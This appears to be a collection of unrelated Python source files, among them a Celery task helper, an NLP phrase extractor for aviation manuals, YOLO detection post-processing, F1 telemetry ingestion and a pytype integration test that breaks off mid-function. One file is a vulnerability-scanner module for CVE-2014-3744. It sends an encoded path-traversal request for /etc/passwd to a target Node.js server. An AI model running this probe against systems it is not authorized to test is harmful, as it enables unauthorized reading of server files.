@return: The TTL (in seconds) for the Redis record to-be-created
@rtype: int
"""
# Set a default TTL as 1 second (in case actual TTL already occurred)
ttl_seconds = 1
option_keys = task_options.keys()
if 'eta' in option_keys:
# Get the difference between the ETA and now (relative to the ETA's timezone)
ttl_seconds = int(
(task_options['eta'] - datetime.datetime.now(tz=task_options['eta'].tzinfo)).total_seconds()
)
elif 'countdown' in option_keys:
ttl_seconds = task_options['countdown']
if 'expires' in option_keys:
if isinstance(task_options['expires'], datetime.datetime):
# Get the difference between the countdown and now (relative to the countdown's timezone)
seconds_until_expiry = int(
(task_options['expires'] - datetime.datetime.now(tz=task_options['expires'].tzinfo)).total_seconds()
)
else:
seconds_until_expiry = task_options['expires']
if seconds_until_expiry < ttl_seconds:
ttl_seconds = seconds_until_expiry
if ttl_seconds <= 0:
ttl_seconds = 1
return ttl_seconds
def unique_task_factory(task_cls):
"""Creates a new, abstract Celery Task class that enables properly-configured Celery tasks to uniquely exist.
@param task_cls: The original base class which should used with UniqueTaskMixin to produce a new Celery task
base class.
@type task_cls: type
@return: The new Celery task base class with unique task-handling functionality mixed in.
@rtype: type
"""
return type(str('UniqueTask'), (UniqueTaskMixin, task_cls), {})
|
python
|
from . import hist, quality
|
python
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Node.js st module Directory Traversal''',
"description": '''A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.''',
"severity": "high",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2014-3744",
"https://github.com/advisories/GHSA-69rr-wvh9-6c4q",
"https://snyk.io/vuln/npm:st:20140206"
],
"classification": {
"cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss-score": "7.5",
"cve-id": "CVE-2014-3744",
"cwe-id": "CWE-22"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2014", "lfi", "nodejs", "st"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
python
|
__copyright__ = "Copyright 2015 Contributing Entities"
__license__ = """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .Assignment import Assignment
from .Error import Error, ConfigurationError
from .FastTrips import FastTrips
from .Logger import FastTripsLogger, setupLogging
from .Passenger import Passenger
from .PathSet import PathSet
from .Performance import Performance
from .Route import Route
from .Run import run_fasttrips, main
from .Stop import Stop
from .TAZ import TAZ
from .Transfer import Transfer
from .Trip import Trip
from .Util import Util
__all__ = [
'Event',
'FastTrips',
'FastTripsLogger', 'setupLogging',
'Passenger',
'PathSet',
'Route',
'Run',
'Stop',
'TAZ',
'Trip',
]
|
python
|
import spacy
nlp = spacy.load('en_core_web_sm')
from spacy.matcher import Matcher, PhraseMatcher
from spacy.tokens import Span
import string
from nltk.corpus import stopwords
import pandas as pd
def phrase_template():
'''
This function returns a list of all the possible technical terms that has high possibility of having several occurances in FAA handbooks and manuals,
or in manuals pertaining to aircraft procedures and emergency procedures.
This list is required to use the Phrase Matcher algoritm of matching the relations.
'''
phrases = ["emergency", "non-normal", " Federal Aviation Administration", "FAA", "Handbook", "emergency landings",
"engine", "emergency landing", "forced landing", "precautionary landing", "ditching", "fire",
"sink rate", "sink rate control", "attitude", "terrain selection", "safety concepts", "configuration",
"approach", "terrain types", "terrain", "confined areas", "trees", "forest", "water", "snow", "after takeoff",
"engine failure after takeoff", "single engine", "single-engine", "emergency descents", "in-flight", "in-flight fire",
"engine fire", "electrical fire", "electrical fires", "cabin fire", "asymmetric", "split", "asymmetric flap", "asymmetric (split) flap", "flap", "flaps",
"malfunction", "flight control malfunction", "flight control malfunctions", "flight control", "total flap failure", "total flaps failure",
"loss", "loss of elevator control", "elevator", "elevator control", "gear", "landing gear", "landing gear malfunction", "gears", "systems malfunction", "systems malfunctions",
"electrical", "electrical system", "pitot", "pitot-static", "pitot tube", "blocked", "blockage", "pitot-static system", "instrument operation", "pressure", "pressure chamber",
"stall", "speed", "vertical speed", "door", "door opening in-flight", "door opeining", "loss", "loss of rpm", "rpm", "loss of manifold pressure", "gain of manifold pressure", "high oil temperature",
"Inadvertent VFR Flight into IMC", "VFR Flight", "VFR", "control", "maintaining", "airplane control", "maintaining airplane control",
"attitude", "attitude indicator", "attitude control", "turns", "spiral", "graveyard spiral", "instabaility", "steep", "banks", "steep banks", "climbs", "descents", "maneuvers", "visual flight",
"extend", "retract", "extension", "retraction", "non-instrument-rated", "pilot", "psychological hazards", "nose", "flying speed", "landing area", "throttle", "runway", "minimum", "touchdown", "glide",
"damage", "groundspeed", "wind", "deceleration", "hydraulics", "hydraulic", "door", "opening", "spiral", "descent", "EFIS", "avionics", "IFR", "propellor", "thrust", "oil temperature", "oil pressure", "fuel pressure",
"displays", "flight display", "cowl", "stall", "stall warning", "stall warning horn", "engines", "fuel", "fuel leak", "fuel shortage", "fuel tank", "fuel supply", "fuel selector", ]
return phrases
def entity_pair(sent):
'''
The subject and the object is extracted from the sentence passed into the function.
'''
ent1 = ""
ent2 = ""
prev_token_dep = ""
prev_token_text = ""
prefix = ""
modifier = ""
for token in nlp(sent):
if token.dep_ != "punct":
if token.dep_ == "compound":
prefix = token.text
if prev_token_dep == "compound":
prefix = prev_token_text + " "+ token.text
if token.dep_.endswith("mod") == True:
modifier = token.text
if prev_token_dep == "compound":
modifier = prev_token_text + " "+ token.text
if token.dep_.find("subj") == True:
ent1 = modifier +" "+ prefix + " "+ token.text
prefix = ""
modifier = ""
prev_token_dep = ""
prev_token_text = ""
if token.dep_.find("obj") == True:
ent2 = modifier +" "+ prefix +" "+ token.text
prev_token_dep = token.dep_
prev_token_text = token.text
return [ent1.strip(), ent2.strip()]
def get_relation(sent):
'''
Relations are identified and matched in each sentence
'''
doc = nlp(sent)
matcher = PhraseMatcher(nlp.vocab)
pattern = list(nlp.tokenizer.pipe(phrase_template()))
matcher.add("matching_1", None, *pattern)
matches = matcher(doc)
k = len(matches) - 1
span = doc
for match_id, start, end in matches:
span = doc[start:end]
return(span.text)
def cleanup_text(docs, logging=False):
'''
The text loaded from the PDF is cleaned and lemmatized. Entities such as Punctuations, stop words, pronouns etc are removed
'''
texts = []
counter = 1
for doc in docs:
if counter % 1000 == 0 and logging:
print("Processed %d out of %d documents." % (counter, len(docs)))
counter += 1
doc = nlp(doc, disable=['parser', 'ner'])
tokens = [tok.lemma_.lower().strip() for tok in doc if tok.lemma_ != '-PRON-']
tokens = [tok for tok in tokens if tok not in stopwords.words('english') and tok not in string.punctuation]
tokens = ' '.join(tokens)
texts.append(tokens)
return pd.Series(texts)
|
python
|
# Import the agent class
#from .agenttemplate import AgentTemplate
|
python
|
# Copyright © 2020 Arm Ltd and Contributors. All rights reserved.
# SPDX-License-Identifier: MIT
"""
Contains functions specific to decoding and processing inference results for YOLO V3 Tiny models.
"""
import cv2
import numpy as np
def iou(box1: list, box2: list):
"""
Calculates the intersection-over-union (IoU) value for two bounding boxes.
Args:
box1: Array of positions for first bounding box
in the form [x_min, y_min, x_max, y_max].
box2: Array of positions for second bounding box.
Returns:
Calculated intersection-over-union (IoU) value for two bounding boxes.
"""
area_box1 = (box1[2] - box1[0]) * (box1[3] - box1[1])
area_box2 = (box2[2] - box2[0]) * (box2[3] - box2[1])
if area_box1 <= 0 or area_box2 <= 0:
iou_value = 0
else:
y_min_intersection = max(box1[1], box2[1])
x_min_intersection = max(box1[0], box2[0])
y_max_intersection = min(box1[3], box2[3])
x_max_intersection = min(box1[2], box2[2])
area_intersection = max(0, y_max_intersection - y_min_intersection) *\
max(0, x_max_intersection - x_min_intersection)
area_union = area_box1 + area_box2 - area_intersection
try:
iou_value = area_intersection / area_union
except ZeroDivisionError:
iou_value = 0
return iou_value
def yolo_processing(output: np.ndarray, confidence_threshold=0.40, iou_threshold=0.40):
"""
Performs non-maximum suppression on input detections. Any detections
with IOU value greater than given threshold are suppressed.
Args:
output: Vector of outputs from network.
confidence_threshold: Selects only strong detections above this value.
iou_threshold: Filters out boxes with IOU values above this value.
Returns:
A list of detected objects in the form [class, [box positions], confidence]
"""
if len(output) != 1:
raise RuntimeError('Number of outputs from YOLO model does not equal 1')
# Find the array index of detections with confidence value above threshold
confidence_det = output[0][:, :, 4][0]
detections = list(np.where(confidence_det > confidence_threshold)[0])
all_det, nms_det = [], []
# Create list of all detections above confidence threshold
for d in detections:
box_positions = list(output[0][:, d, :4][0])
confidence_score = output[0][:, d, 4][0]
class_idx = np.argmax(output[0][:, d, 5:])
all_det.append((class_idx, box_positions, confidence_score))
# Suppress detections with IOU value above threshold
while all_det:
element = int(np.argmax([all_det[i][2] for i in range(len(all_det))]))
nms_det.append(all_det.pop(element))
all_det = [*filter(lambda x: (iou(x[1], nms_det[-1][1]) <= iou_threshold), [det for det in all_det])]
return nms_det
def yolo_resize_factor(video: cv2.VideoCapture, input_binding_info: tuple):
"""
Gets a multiplier to scale the bounding box positions to
their correct position in the frame.
Args:
video: Video capture object, contains information about data source.
input_binding_info: Contains shape of model input layer.
Returns:
Resizing factor to scale box coordinates to output frame size.
"""
frame_height = video.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_width = video.get(cv2.CAP_PROP_FRAME_WIDTH)
model_height, model_width = list(input_binding_info[1].GetShape())[1:3]
return max(frame_height, frame_width) / max(model_height, model_width)
|
python
|
from xml.etree.ElementTree import tostring
from f1_telemetry.server import get_telemetry
from kusto.ingest import ingest_kusto
from datetime import datetime
batch_freq_high = 9 # 20 cars per packet * batch_freq_high(x) packets
batch_freq_low = 2
ingest_cartelemetrydataCnt = 0
ingest_cartelemetryBuffer = ""
ingest_sessiondataCnt = 0
ingest_sessiondataBuffer = ""
ingest_lapdataCnt = 0
ingest_lapdataBuffer =""
ingest_carstatusdataCnt =0
ingest_carstatusdataBuffer=""
def ingest_cartelemetrydata(packet, m_header):
#print ("car telemetry length..", len(packet.m_carTelemetryData))
global ingest_cartelemetryBuffer
global ingest_cartelemetrydataCnt
#print ("SUID ", m_header.m_sessionUID)
for idx,cartelemetrydata in enumerate(packet.m_carTelemetryData):
data = [
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
cartelemetrydata.m_speed,
cartelemetrydata.m_throttle,
cartelemetrydata.m_steer,
cartelemetrydata.m_brake,
cartelemetrydata.m_clutch,
cartelemetrydata.m_gear,
cartelemetrydata.m_engineRPM,
cartelemetrydata.m_drs,
cartelemetrydata.m_revLightsPercent,
'', #cartelemetrydata.m_brakesTemperature fix parse issue
cartelemetrydata.m_tyresSurfaceTemperature[0],
cartelemetrydata.m_tyresSurfaceTemperature[1],
cartelemetrydata.m_tyresSurfaceTemperature[2],
cartelemetrydata.m_tyresSurfaceTemperature[3],
cartelemetrydata.m_tyresInnerTemperature[0],
cartelemetrydata.m_tyresInnerTemperature[1],
cartelemetrydata.m_tyresInnerTemperature[2],
cartelemetrydata.m_tyresInnerTemperature[3],
cartelemetrydata.m_engineTemperature,
cartelemetrydata.m_tyresPressure[0],
cartelemetrydata.m_tyresPressure[1],
cartelemetrydata.m_tyresPressure[2],
cartelemetrydata.m_tyresPressure[3],
cartelemetrydata.m_surfaceType[0],
cartelemetrydata.m_surfaceType[1],
cartelemetrydata.m_surfaceType[2],
cartelemetrydata.m_surfaceType[3]
]
ingest_cartelemetryBuffer += ','.join(map(str, data))
ingest_cartelemetryBuffer +="\n"
if ingest_cartelemetrydataCnt == batch_freq_high:
#print(ingest_cartelemetryBuffer)
ingest_kusto("CarTelemetry", ingest_cartelemetryBuffer )
ingest_cartelemetryBuffer=""
ingest_cartelemetrydataCnt=0
else:
ingest_cartelemetrydataCnt+=1
def ingest_sessiondata(sessiondatapacket, m_header):
global ingest_sessiondataBuffer
global ingest_sessiondataCnt
data =[
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
sessiondatapacket.m_weather,
sessiondatapacket.m_trackTemperature,
sessiondatapacket.m_airTemperature,
sessiondatapacket.m_totalLaps,
sessiondatapacket.m_trackId,
sessiondatapacket.m_trackLength,
sessiondatapacket.m_sessionType,
sessiondatapacket.m_sessionDuration,
sessiondatapacket.m_sessionTimeLeft
]
ingest_sessiondataBuffer = ','.join(map(str, data))
ingest_sessiondataBuffer +="\n"
if ingest_sessiondataCnt == batch_freq_low:
ingest_kusto("Session", ingest_sessiondataBuffer )
# print(ingest_sessiondataBuffer)
ingest_sessiondataBuffer=""
ingest_sessiondataCnt=0
else:
ingest_sessiondataCnt+=1
def ingest_participantdata(packet, m_header):
participantdataBuffer=""
for idx, participantdata in enumerate(packet.m_participants):
data =[
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
packet.m_numActiveCars,
participantdata.m_aiControlled,
participantdata.m_driverId,
participantdata.m_teamId,
participantdata.m_raceNumber,
participantdata.m_nationality,
participantdata.m_name.decode()
]
participantdataBuffer += ','.join(map(str, data))
participantdataBuffer+="\n"
#print(participantdataBuffer)
ingest_kusto("Participant", participantdataBuffer)
def ingest_lapdata(packet, m_header):
global ingest_lapdataBuffer
global ingest_lapdataCnt
for idx,lapdata in enumerate(packet.m_lapsData):
data = [
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
lapdata.m_lastLapTime,
lapdata.m_currentLapTime,
lapdata.m_bestLapTime,
lapdata.m_carPosition,
lapdata.m_currentLapNum,
lapdata.m_currentLapInvalid,
lapdata.m_lapDistance,
lapdata.m_totalDistance,
lapdata.m_gridPosition,
lapdata.m_pitStatus,
lapdata.m_penalties,
lapdata.m_driverStatus,
lapdata.m_resultStatus
]
ingest_lapdataBuffer += ','.join(map(str, data))
ingest_lapdataBuffer +="\n"
if ingest_lapdataCnt == batch_freq_high:
#print(ingest_lapdataBuffer)
ingest_kusto("Lap", ingest_lapdataBuffer )
ingest_lapdataBuffer=""
ingest_lapdataCnt=0
else:
ingest_lapdataCnt+=1
def ingest_carstatusdata(packet, m_header):
global ingest_carstatusdataBuffer
global ingest_carstatusdataCnt
for idx,carstatusdata in enumerate(packet.m_carStatusData):
data = [
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
carstatusdata.m_tractionControl,
carstatusdata.m_antiLockBrakes,
carstatusdata.m_fuelMix,
carstatusdata.m_fuelInTank,
carstatusdata.m_fuelCapacity,
carstatusdata.m_fuelRemainingLaps,
carstatusdata.m_maxRPM,
carstatusdata.m_idleRPM,
carstatusdata.m_maxGears,
carstatusdata.m_drsAllowed,
carstatusdata.m_tyresWear[0],
carstatusdata.m_tyresWear[1],
carstatusdata.m_tyresWear[2],
carstatusdata.m_tyresWear[3],
carstatusdata.m_actualTyreCompound,
carstatusdata.m_tyreVisualCompound,
carstatusdata.m_tyresDamage[0],
carstatusdata.m_tyresDamage[1],
carstatusdata.m_tyresDamage[2],
carstatusdata.m_tyresDamage[3],
carstatusdata.m_frontLeftWingDamage,
carstatusdata.m_frontRightWingDamage,
carstatusdata.m_rearWingDamage,
carstatusdata.m_engineDamage,
carstatusdata.m_gearBoxDamage,
carstatusdata.m_vehicleFiaFlags
]
ingest_carstatusdataBuffer += ','.join(map(str, data))
ingest_carstatusdataBuffer +="\n"
if ingest_carstatusdataCnt == batch_freq_high:
#print(ingest_carstatusdataBuffer)
ingest_kusto("CarStatus", ingest_carstatusdataBuffer )
ingest_carstatusdataBuffer=""
ingest_carstatusdataCnt=0
else:
ingest_carstatusdataCnt+=1
if __name__ == '__main__':
print("Server started on 20777")
for packet, theader, m_header, player in get_telemetry():
#print(theader, packet)
if theader == 0: #PacketMotionData
""" print(theader, packet.m_wheelSpeed[0], packet.m_wheelSpeed[1],
packet.m_wheelSpeed[2], packet.m_wheelSpeed[3])
"""
elif theader == 1: #PacketSessionData
ingest_sessiondata(packet, m_header)
elif theader == 2:
ingest_lapdata(packet, m_header)
elif theader == 3:
print(dir(packet.m_eventStringCode))
print(theader, "Event ID: ", packet.m_eventStringCode._type_)
elif theader == 4:
#print("ID: ", theader)
ingest_participantdata(packet,m_header)
elif theader == 5:
""" for setupdata in packet.m_carSetups:
print(theader, "Front Wing: ", setupdata.m_frontWing,
"Rear Wing: ", setupdata.m_rearWing,
"Differential on throttle: ", setupdata.m_onThrottle,
"Differential off throttle: ", setupdata.m_offThrottle,
"Front camber: ", setupdata.m_frontCamber,
"Rear camber: ", setupdata.m_rearCamber,
"Front toe: ", setupdata.m_frontToe,
"Rear toe: ", setupdata.m_rearToe,
"Front suspension: ", setupdata.m_frontSuspension,
"Rear suspension: ", setupdata.m_rearSuspension,
"Front bar: ", setupdata.m_frontAntiRollBar,
"Rear bar: ", setupdata.m_rearAntiRollBar,
"Front height: ", setupdata.m_frontSuspensionHeight,
"Rear height: ", setupdata.m_rearSuspensionHeight,
"Brake pressure (%): ", setupdata.m_brakePressure,
"Brake bias (%): ", setupdata.m_brakeBias,
"Front tyre (PSI): ", setupdata.m_frontTyrePressure,
"Rear tyre (PSI): ", setupdata.m_rearTyrePressure,
"Ballast: ", setupdata.m_ballast,
"Fuel Load: ", setupdata.m_fuelLoad)
"""
elif theader == 6:
ingest_cartelemetrydata(packet, m_header)
elif theader == 7:
ingest_carstatusdata(packet, m_header)
|
python
|
"""Integration test for pytype."""
from __future__ import print_function
import csv
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
import textwrap
from pytype import config
from pytype import main as main_module
from pytype import utils
from pytype.pyi import parser
from pytype.pytd import pytd_utils
from pytype.pytd import typeshed
from pytype.pytd.parse import builtins
from pytype.tests import test_base
import unittest
class PytypeTest(unittest.TestCase):
"""Integration test for pytype."""
PYTHON_VERSION = (2, 7)
DEFAULT_PYI = builtins.DEFAULT_SRC
INCLUDE = object()
@classmethod
def setUpClass(cls):
super(PytypeTest, cls).setUpClass()
cls.pytype_dir = os.path.dirname(os.path.dirname(parser.__file__))
def setUp(self):
super(PytypeTest, self).setUp()
self._ResetPytypeArgs()
self.tmp_dir = tempfile.mkdtemp()
self.errors_csv = os.path.join(self.tmp_dir, "errors.csv")
def tearDown(self):
super(PytypeTest, self).tearDown()
shutil.rmtree(self.tmp_dir)
def _ResetPytypeArgs(self):
self.pytype_args = {
"--python_version": utils.format_version(self.PYTHON_VERSION),
"--verbosity": 1
}
def _DataPath(self, filename):
if os.path.dirname(filename) == self.tmp_dir:
return filename
return os.path.join(self.pytype_dir, "test_data/", filename)
def _TmpPath(self, filename):
return os.path.join(self.tmp_dir, filename)
def _MakePyFile(self, contents):
if utils.USE_ANNOTATIONS_BACKPORT:
contents = test_base.WithAnnotationsImport(contents)
return self._MakeFile(contents, extension=".py")
def _MakeFile(self, contents, extension):
contents = textwrap.dedent(contents)
path = self._TmpPath(
hashlib.md5(contents.encode("utf-8")).hexdigest() + extension)
with open(path, "w") as f:
print(contents, file=f)
return path
def _RunPytype(self, pytype_args_dict):
"""A single command-line call to the pytype binary.
Typically you'll want to use _CheckTypesAndErrors or
_InferTypesAndCheckErrors, which will set up the command-line arguments
properly and check that the errors file is in the right state after the
call. (The errors check is bundled in to avoid the user forgetting to call
assertHasErrors() with no arguments when expecting no errors.)
Args:
pytype_args_dict: A dictionary of the arguments to pass to pytype, minus
the binary name. For example, to run
pytype simple.py --output=-
the arguments should be {"simple.py": self.INCLUDE, "--output": "-"}
"""
pytype_exe = os.path.join(self.pytype_dir, "pytype")
pytype_args = [pytype_exe]
for arg, value in pytype_args_dict.items():
if value is not self.INCLUDE:
arg += "=" + str(value)
pytype_args.append(arg)
p = subprocess.Popen(
pytype_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.stdout, self.stderr = (s.decode("utf-8") for s in p.communicate())
self.returncode = p.returncode
def _ParseString(self, string):
"""A wrapper for parser.parse_string that inserts the python version."""
return parser.parse_string(string, python_version=self.PYTHON_VERSION)
def _GenerateBuiltinsTwice(self, python_version):
os.environ["PYTHONHASHSEED"] = "0"
f1 = self._TmpPath("builtins1.pickle")
f2 = self._TmpPath("builtins2.pickle")
for f in (f1, f2):
self.pytype_args["--generate-builtins"] = f
self.pytype_args["--python_version"] = python_version
self._RunPytype(self.pytype_args)
return f1, f2
def assertBuiltinsPickleEqual(self, f1, f2):
with open(f1, "rb") as pickle1, open(f2, "rb") as pickle2:
if pickle1.read() == pickle2.read():
return
out1 = pytd_utils.LoadPickle(f1, compress=True)
out2 = pytd_utils.LoadPickle(f2, compress=True)
raise AssertionError("\n".join(pytd_utils.DiffNamedPickles(out1, out2)))
def assertOutputStateMatches(self, **has_output):
"""Check that the output state matches expectations.
If, for example, you expect the program to print something to stdout and
nothing to stderr before exiting with an error code, you would write
assertOutputStateMatches(stdout=True, stderr=False, returncode=True).
Args:
**has_output: Whether each output type should have output.
"""
output_types = {"stdout", "stderr", "returncode"}
assert len(output_types) == len(has_output)
for output_type in output_types:
output_value = getattr(self, output_type)
if has_output[output_type]:
self.assertTrue(output_value, output_type + " unexpectedly empty")
else:
value = str(output_value)
if len(value) > 50:
value = value[:47] + "..."
self.assertFalse(
output_value, "Unexpected output to %s: %r" % (output_type, value))
def assertHasErrors(self, *expected_errors):
with open(self.errors_csv, "r") as f:
errors = list(csv.reader(f, delimiter=","))
num, expected_num = len(errors), len(expected_errors)
try:
self.assertEqual(num, expected_num,
"Expected %d errors, got %d" % (expected_num, num))
for error, expected_error in zip(errors, expected_errors):
self.assertEqual(expected_error, error[2],
"Expected %r, got %r" % (expected_error, error[2]))
except:
print("\n".join(" | ".join(error) for error in errors), file=sys.stderr)
raise
def _SetUpChecking(self, filename):
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--check"] = self.INCLUDE
def _CheckTypesAndErrors(self, filename, expected_errors):
self._SetUpChecking(filename)
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertHasErrors(*expected_errors)
def _InferTypesAndCheckErrors(self, filename, expected_errors):
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--output"] = "-"
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertHasErrors(*expected_errors)
def assertInferredPyiEquals(self, expected_pyi=None, filename=None):
assert bool(expected_pyi) != bool(filename)
if filename:
with open(self._DataPath(filename), "r") as f:
expected_pyi = f.read()
message = ("\n==Expected pyi==\n" + expected_pyi +
"\n==Actual pyi==\n" + self.stdout)
self.assertTrue(self._ParseString(self.stdout).ASTeq(
self._ParseString(expected_pyi)), message)
def GeneratePickledSimpleFile(self, pickle_name, verify_pickle=True):
pickled_location = os.path.join(self.tmp_dir, pickle_name)
self.pytype_args["--pythonpath"] = self.tmp_dir
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args["--module-name"] = "simple"
if verify_pickle:
self.pytype_args["--verify-pickle"] = self.INCLUDE
self.pytype_args["--output"] = pickled_location
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=0)
self.assertTrue(os.path.exists(pickled_location))
return pickled_location
def testPickledFileStableness(self):
# Tests that the pickled format is stable under a constant PYTHONHASHSEED.
l_1 = self.GeneratePickledSimpleFile("simple1.pickled")
l_2 = self.GeneratePickledSimpleFile("simple2.pickled")
with open(l_1, "rb") as f_1:
with open(l_2, "rb") as f_2:
self.assertEqual(f_1.read(), f_2.read())
def testGeneratePickledAst(self):
self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=True)
def testGenerateUnverifiedPickledAst(self):
self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=False)
def testPickleNoOutput(self):
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPickleBadOutput(self):
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args["--output"] = os.path.join(self.tmp_dir, "simple.pyi")
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadVerifyPickle(self):
self.pytype_args["--verify-pickle"] = self.INCLUDE
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testNonexistentOption(self):
self.pytype_args["--rumpelstiltskin"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCfgTypegraphConflict(self):
self._SetUpChecking("simple.py")
output_path = self._TmpPath("simple.svg")
self.pytype_args["--output-cfg"] = output_path
self.pytype_args["--output-typegraph"] = output_path
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict(self):
self.pytype_args["--check"] = self.INCLUDE
self.pytype_args["--output"] = "-"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict2(self):
self.pytype_args["--check"] = self.INCLUDE
self.pytype_args["input.py:output.pyi"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testInputOutputPair(self):
self.pytype_args[self._DataPath("simple.py") +":-"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertInferredPyiEquals(filename="simple.pyi")
def testMultipleOutput(self):
self.pytype_args["input.py:output1.pyi"] = self.INCLUDE
self.pytype_args["--output"] = "output2.pyi"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsInputConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["input.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPythonpathConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["--pythonpath"] = "foo:bar"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPy2(self):
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testGenerateBuiltinsPy3(self):
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
self.pytype_args["--python_version"] = "3.6"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testMissingInput(self):
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testMultipleInput(self):
self.pytype_args["input1.py"] = self.INCLUDE
self.pytype_args["input2.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadInputFormat(self):
self.pytype_args["input.py:output.pyi:rumpelstiltskin"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPytypeErrors(self):
self._SetUpChecking("bad.py")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
self.assertIn("[unsupported-operands]", self.stderr)
self.assertIn("[name-error]", self.stderr)
def testPytypeErrorsCsv(self):
self._SetUpChecking("bad.py")
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertHasErrors("unsupported-operands", "name-error")
def testPytypeErrorsNoReport(self):
self._SetUpChecking("bad.py")
self.pytype_args["--no-report-errors"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testPytypeReturnSuccess(self):
self._SetUpChecking("bad.py")
self.pytype_args["--return-success"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=False)
self.assertIn("[unsupported-operands]", self.stderr)
self.assertIn("[name-error]", self.stderr)
def testCompilerError(self):
self._CheckTypesAndErrors("syntax.py", ["python-compiler-error"])
def testMultiLineStringTokenError(self):
self._CheckTypesAndErrors("tokenerror1.py", ["python-compiler-error"])
def testMultiLineStatementTokenError(self):
